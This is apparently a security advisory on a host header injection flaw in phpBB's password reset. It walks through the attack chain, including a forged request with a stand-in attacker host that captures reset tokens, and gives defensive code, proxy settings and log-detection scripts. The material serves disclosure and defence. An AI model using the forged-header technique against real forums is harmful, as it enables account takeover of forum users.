phpBB Password Reset Flow Vulnerable to Host Header Injection
phpBB, one of the world's most widely deployed open-source forum platforms, is affected by CVE-2026-29199, a high-severity host header injection vulnerability in its password reset flow. The flaw allows an unauthenticated attacker to manipulate the HTTP Host header to poison the reset link URL embedded in password reset emails, redirecting victims to an attacker-controlled server where the secret reset token can be captured.
The vulnerability carries a CVSS score of 8.1 and affects all phpBB versions before 3.3.16. Users should upgrade immediately to phpBB 3.3.16 or later.
Vulnerability Details
| Attribute | Value |
|---|---|
| CVE ID | CVE-2026-29199 |
| CVSS Score | 8.1 (High) |
| Affected Versions | phpBB < 3.3.16 |
| Patched Version | phpBB 3.3.16 |
| Attack Type | Host Header Injection → Password Reset Link Poisoning |
| Condition | force_server_vars must be disabled (default in many installs) |
| Authentication Required | None |
| User Interaction | Required (victim clicks poisoned link) |
| Disclosure Date | May 4, 2026 |
How the Attack Works
Root Cause
phpBB's password reset mechanism constructs the reset URL by reading the server hostname from the HTTP Host request header when the configuration option force_server_vars is disabled. This configuration is disabled by default on many installations, particularly those behind reverse proxies that forward the original client-supplied Host header without stripping or validating it.
An attacker can forge the Host header in a password reset request to inject an arbitrary hostname. phpBB will then construct a reset link using that attacker-supplied hostname and include it in the email sent to the victim.
Attack Chain
1. Attacker identifies a valid user account on the target phpBB forum
2. Attacker sends a password reset request with a forged Host header:
POST /ucp.php?mode=sendpassword HTTP/1.1
Host: attacker.example.com
3. phpBB reads the Host header and builds the reset URL:
https://attacker.example.com/ucp.php?mode=activate&code=SECRET_TOKEN
4. phpBB emails the victim the poisoned reset link
5. Victim clicks the link — browser contacts attacker.example.com
6. Attacker captures SECRET_TOKEN from the request log
7. Attacker uses the token against the real phpBB forum to reset the password
8. Full account takeover achieved without knowing the victim's current credentials
Why force_server_vars Matters
When force_server_vars is enabled, phpBB uses the admin-configured server name, port, and script path from the board settings rather than trusting the HTTP Host header, so a forged header never reaches the reset link. The setting is off by default, and many forum administrators either leave it that way or are unaware of its security significance.
Installations sitting behind reverse proxies such as Nginx, Apache, Caddy, or Traefik are particularly at risk if the proxy does not sanitize the Host header before forwarding requests to phpBB.
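The following is an added example, not phpBB's own code: a simplified Python model of the reset-link construction described in the attack chain above. The config keys, function names, and request shape are assumptions made for illustration; the URL shape is the one shown in step 3. The "vulnerable" builder reproduces the behaviour the advisory describes (the Host header is trusted whenever force_server_vars is off), and the "hardened" builder shows the two fixes side by side: honouring force_server_vars, and otherwise only accepting a Host value that is on an explicit allowlist.

```python
"""Simplified model of reset-link construction for this advisory.

Added example; not phpBB's own code.  CONFIG, the function names and the
request shape are assumptions made for illustration.
"""
import re
from urllib.parse import urlencode

# Hypothetical board settings modelled on the ACP fields this advisory names
# (Server name, Server port, Script path, Force server URL settings).
CONFIG = {
    "force_server_vars": False,
    "server_protocol": "https://",
    "server_name": "yourforum.example.com",
    "server_port": 443,
    "script_path": "/",
}

# Hostname (letters, digits, hyphens, dots) with an optional :port suffix.
_HOST_RE = re.compile(
    r"^(?P<host>[a-z0-9](?:[a-z0-9-]*[a-z0-9])?(?:\.[a-z0-9](?:[a-z0-9-]*[a-z0-9])?)*)"
    r"(?::(?P<port>\d{1,5}))?$"
)


def _reset_path(config, token):
    """Path and query of the reset link, in the shape the advisory shows."""
    path = config["script_path"].rstrip("/") + "/ucp.php"
    return path + "?" + urlencode({"mode": "activate", "code": token})


def _origin(config, host):
    """Scheme + host, adding the configured port only when it is not the default."""
    default = 443 if config["server_protocol"] == "https://" else 80
    port = "" if config["server_port"] == default else f":{config['server_port']}"
    return config["server_protocol"] + host + port


def build_reset_link_vulnerable(request_headers, token, config=CONFIG):
    """Trusts the Host header whenever force_server_vars is off (the flaw)."""
    if config["force_server_vars"]:
        return _origin(config, config["server_name"]) + _reset_path(config, token)
    # Whatever the client sent (including any port) ends up in the e-mailed link.
    host = request_headers.get("Host", config["server_name"])
    return config["server_protocol"] + host + _reset_path(config, token)


def resolve_host(request_headers, config=CONFIG, allowed_hosts=None):
    """Return (host, source) where source is 'config', 'header' or 'rejected'.

    With force_server_vars on, the header is never consulted.  Otherwise the
    Host value is normalised (lower-cased, port stripped) and used only if it
    is on the allowlist; anything else falls back to the configured name.
    """
    configured = config["server_name"].lower()
    if config["force_server_vars"]:
        return configured, "config"
    allowed = {h.lower() for h in (allowed_hosts or [configured])}
    m = _HOST_RE.match(request_headers.get("Host", "").strip().lower())
    if not m or m.group("host") not in allowed:
        return configured, "rejected"
    return m.group("host"), "header"


def build_reset_link_hardened(request_headers, token, config=CONFIG, allowed_hosts=None):
    """Same link, but the host can only be the configured name or an allowlisted alias."""
    host, _source = resolve_host(request_headers, config, allowed_hosts)
    return _origin(config, host) + _reset_path(config, token)


if __name__ == "__main__":
    token = "SECRET_TOKEN"  # placeholder; a real token is a random secret
    for hdrs in ({"Host": "attacker.example.com"}, {"Host": "YourForum.example.com:443"}):
        print("Host:", hdrs["Host"])
        print("  vulnerable:", build_reset_link_vulnerable(hdrs, token))
        print("  hardened:  ", build_reset_link_hardened(hdrs, token))
```

The allowlist in resolve_host is what a proxy-independent fix looks like when a board is legitimately reachable under more than one name; if there is only one name, enabling force_server_vars (the "config" branch) is simpler and equivalent.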
Affected Deployments
| Scenario | Risk Level |
|---|---|
| phpBB with force_server_vars disabled, behind proxy that forwards Host | High — vulnerable |
| phpBB with force_server_vars disabled, direct internet exposure | High — vulnerable |
| phpBB with force_server_vars enabled | Mitigated |
| phpBB 3.3.16 or later | Patched |
| Proxy strips and re-sets Host to known hostname | Mitigated |
Remediation
Option 1: Upgrade to phpBB 3.3.16 (Recommended)
The patch in phpBB 3.3.16 restricts which values are accepted for building reset URLs. Upgrade your phpBB installation immediately.
# Download phpBB 3.3.16
wget https://www.phpbb.com/files/release/phpBB-3.3.16.zip
# Extract over existing installation (backup first)
unzip phpBB-3.3.16.zip
# Run the update script via your browser
# Navigate to: https://yourforum.example.com/install/
Option 2: Enable force_server_vars
Until you can upgrade, enable force_server_vars in your phpBB Admin Control Panel:
- Log in to the Admin Control Panel (ACP)
- Navigate to General → Server Configuration → Server Settings
- Set "Force server URL settings" to Yes
- Ensure Server name, Server port, and Script path are correctly configured
- Save changes
This forces phpBB to use the admin-configured values rather than the HTTP Host header.
Option 3: Sanitize Host Headers at the Proxy Layer
Configure your reverse proxy to discard the incoming Host header and send the canonical server name to phpBB. Do not forward the client value through variables such as Nginx's $host or $http_host, which simply pass the attacker-supplied header along.
# Nginx — send a fixed canonical Host to the backend
location / {
    proxy_pass http://phpbb-backend;
    proxy_set_header Host "yourforum.example.com";
}
# Apache mod_proxy — with ProxyPreserveHost On, the Host header forwarded is the one mod_headers has already overwritten
ProxyPreserveHost On
RequestHeader set Host "yourforum.example.com"
ProxyPass / http://phpbb-backend/
ProxyPassReverse / http://phpbb-backend/
Detection
Review your web server logs for password reset requests (/ucp.php?mode=sendpassword) whose Host header differs from your forum's legitimate domain. Note that the default "combined" log format of both Nginx and Apache does not record the Host header at all: add "$host" (Nginx log_format) or "%{Host}i" (Apache LogFormat) as the last quoted field first, then filter on it.
# Nginx — assumes a log_format ending in "$host"
grep 'mode=sendpassword' /var/log/nginx/access.log | \
  grep -v '"yourforum.example.com"$'
# Apache — assumes a LogFormat ending in "%{Host}i"
grep 'mode=sendpassword' /var/log/apache2/access.log | \
  grep -v '"yourforum.example.com"$'
Also check outbound email logs for password reset emails sent to users at unexpected timestamps; a sudden burst could indicate an active attack campaign.
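The detection logic above as a small log scanner, added here as an example (not a phpBB or Nginx tool). It assumes an Nginx log_format that appends "$host" as the last quoted field after the combined format, as described above; the log lines it runs over are constructed for the example and the canonical hostname is a placeholder. It flags reset requests whose Host is not the forum's own and, for the burst check, counts reset requests per source address inside a sliding window.

```python
"""Scan access-log lines for poisoned or bursty password-reset requests.

Added example for this advisory, not a phpBB or nginx tool.  Assumes an
nginx log_format that appends the request host after the combined format:

    log_format withhost '$remote_addr - $remote_user [$time_local] '
                        '"$request" $status $body_bytes_sent '
                        '"$http_referer" "$http_user_agent" "$host"';

The default "combined" format does not record Host at all, so this check
cannot run against it.  SAMPLE_LOG below is constructed, not captured.
"""
import re
from datetime import datetime, timedelta

CANONICAL_HOSTS = {"yourforum.example.com"}  # placeholder canonical name

# Combined format plus a trailing quoted host field.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" "(?P<host>[^"]*)"$'
)
# mode=sendpassword anywhere in the ucp.php query string.
RESET_RE = re.compile(r"/ucp\.php\?(?:.*&)?mode=sendpassword(?:&|$)")

SAMPLE_LOG = """\
203.0.113.7 - - [04/May/2026:10:00:01 +0000] "POST /ucp.php?mode=sendpassword HTTP/1.1" 200 512 "-" "curl/8.5.0" "attacker.example.com"
198.51.100.20 - - [04/May/2026:10:00:05 +0000] "POST /ucp.php?mode=sendpassword HTTP/1.1" 200 512 "https://yourforum.example.com/ucp.php?mode=sendpassword" "Mozilla/5.0" "yourforum.example.com"
198.51.100.20 - - [04/May/2026:10:00:06 +0000] "GET /viewtopic.php?t=42 HTTP/1.1" 200 9001 "-" "Mozilla/5.0" "yourforum.example.com"
203.0.113.7 - - [04/May/2026:10:01:30 +0000] "POST /ucp.php?mode=sendpassword HTTP/1.1" 200 512 "-" "curl/8.5.0" "attacker.example.com:443"
203.0.113.7 - - [04/May/2026:10:02:45 +0000] "POST /ucp.php?mode=sendpassword HTTP/1.1" 200 512 "-" "curl/8.5.0" "YOURFORUM.example.com.evil.test"
203.0.113.7 - - [04/May/2026:10:03:00 +0000] "GET /ucp.php?mode=sendpassword HTTP/1.1" 200 2048 "-" "curl/8.5.0" "attacker.example.com"
"""


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    entry["time"] = datetime.strptime(entry["time"], "%d/%b/%Y:%H:%M:%S %z")
    # Lower-case and drop any :port so "Host: Example.com:443" compares equal.
    entry["host"] = entry["host"].lower().split(":")[0]
    return entry


def is_reset_request(entry):
    """True for any request to the sendpassword endpoint (GET form or POST submit)."""
    return RESET_RE.search(entry["path"]) is not None


def find_poisoned_resets(lines, canonical=CANONICAL_HOSTS):
    """Return reset-endpoint requests whose Host is not one of the canonical names."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and is_reset_request(entry) and entry["host"] not in canonical:
            hits.append(entry)
    return hits


def reset_bursts(lines, window=timedelta(minutes=5), threshold=3):
    """Map source IP -> peak number of reset requests seen inside any one window."""
    by_ip = {}
    for line in lines:
        entry = parse_line(line)
        if entry and is_reset_request(entry):
            by_ip.setdefault(entry["ip"], []).append(entry["time"])
    flagged = {}
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # slide the window forward
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[ip] = max(flagged.get(ip, 0), count)
    return flagged


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    for hit in find_poisoned_resets(lines):
        print(f"{hit['time']:%Y-%m-%d %H:%M:%S} {hit['ip']} {hit['method']} host={hit['host']}")
    print("bursts:", reset_bursts(lines))
```

Both GET and POST requests to the endpoint are flagged on purpose: a poisoned Host on the GET that loads the form is the same reconnaissance signal, and the page's own grep does not filter on method either.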
Impact Assessment
phpBB powers a significant portion of the world's online forums and community platforms, many of which remain self-hosted by individuals and small organizations without dedicated security teams. The combination of a high CVSS score, no authentication requirement, and a simple single-HTTP-request attack vector makes this vulnerability highly accessible to automated exploitation at scale.
Community forum accounts often aggregate years of private messages, financial discussions, and sensitive community data — making account takeover via poisoned reset links a meaningful real-world threat.